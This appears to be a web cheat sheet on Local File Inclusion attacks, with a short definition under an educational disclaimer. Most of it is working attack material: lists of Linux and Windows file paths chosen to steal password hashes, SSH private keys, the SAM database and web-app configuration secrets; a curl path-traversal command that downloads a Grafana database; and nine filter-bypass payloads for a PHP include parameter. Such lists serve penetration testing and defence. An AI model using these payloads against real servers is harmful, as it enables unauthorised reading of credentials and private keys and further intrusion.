Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

Introduction

Local File Inclusion (LFI) is a type of vulnerability in web applications that allows an attacker to read and potentially execute files on the server that hosts the web application. This occurs when an application includes files without properly sanitizing user input, allowing paths to unintended files to be injected. LFI can lead to information disclosure and remote code execution.

Common LFI Paths on Linux Systems

  1. Accesses the system user account and password file.
    /etc/passwd
  2. Reads the root user email files.
    /var/mail/root
  3. Retrieves SSH private keys from a user home directory.
    /home/user/.ssh/id_rsa
  4. Reads the Apache web server access log.
    /var/log/apache2/access.log
  5. Accesses WordPress configuration files typically located in web server directories
    /var/www/html/wp-config.php
  6. Reads the shadow file containing encrypted passwords and related information for user accounts.
    /etc/shadow
  7. curl --path-as-is http://[DOMAIN_NAME]/public/plugins/alertGroups/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Common LFI Paths on Windows Systems

  1. Retrieves the Windows initialization file, which contains settings. \windows\win.ini
  2. Retrieves SSH private keys in the user directory.
    C:/Users/viewer/.ssh/id_rsa

  3. IIS WEb config file C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config C:\inetpub\wwwroot\web.config

  4. Accesses the system hosts file, which contains network information.
    C:/Windows/System32/drivers/etc/hosts

  5. Reads IIS web server log files, which can be exploited for further attacks.
    C:/inetpub/logs/LogFiles/W3SVC1/u_ex<date>.log
  6. Accesses the boot configuration data with startup settings.
    C:/boot.ini
  7. Reads the autoexec batch file used in older versions of Windows for global environment settings.
    C:/autoexec.bat
  8. Accesses the hosts file to view or manipulate network settings.
    C:/windows/system32/drivers/etc/hosts
  9. Retrieves the Security Accounts Manager file storing user credentials.
    C:/windows/repair/SAM
  10. Accesses the WordPress configuration file on XAMPP installations.
    ../../../../../../../../xampp/htdocs/blog/wp-config.php
  11. Retrieves SSH private keys from a user profile.
    ../../../../../../../../Users/Viewer/.ssh/id_rsa

LFI Filter Bypassing Techniques

Techniques for bypassing LFI filters using path traversal, filter bypasses, and encoding:

  1. Basic LFI: Displays the system password file.
    /index.php?language=/etc/passwd
  2. Path Traversal LFI: Uses directory traversal to access critical system files.
    /index.php?language=../../../../etc/passwd
  3. Name Prefix LFI: Similar to basic path traversal with different path depth.
    /index.php?language=/../../../etc/passwd
  4. Approved Path LFI: Bypasses restrictions by starting with an allowed path.
    /index.php?language=./languages/../../../../etc/passwd
  5. Basic Path Traversal Bypass: Uses obscure sequences to bypass simple traversal filters.
    /index.php?language=....//....//....//....//etc/passwd
  6. URL Encoding Filter Bypass: Encodes traversal sequences to evade detection.
    /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
  7. Path Truncation: Uses deep recursion to force path truncation.
    /index.php?language=non_existing_directory/../../../etc/passwd/./././.[REPEATED ~2048 times]
  8. Null Byte Obsolescence: Appends a null byte to terminate the string prematurely (not effective on modern systems).
    /index.php?language=../../../../etc/passwd%00
  9. Base64 PHP Reading: Encodes PHP files into base64 for safer retrieval.
    /index.php?language=php://filter/read=convert.base64-encode/resource=config